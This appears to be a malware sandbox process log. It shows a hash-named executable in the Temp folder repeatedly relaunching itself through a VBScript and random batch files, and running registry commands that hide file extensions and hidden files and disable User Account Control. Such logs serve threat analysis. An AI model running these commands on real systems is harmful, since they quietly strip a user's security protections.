cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jmUIIwII.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TkgscIUs.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iIYYYQsk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cikEkwIA.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kIsoYoIE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CWEgMcwY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OockIIoY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JsUcIUwk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ROgAUkEE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jmocwscs.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tuYIAIIY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KCEgEUUk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eMoAcIgs.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IIEIYgUY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aSUMAsco.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JwsYEwQs.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rwcwAYkg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZUEAwgoQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jEgAksgE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OUgoEoAI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

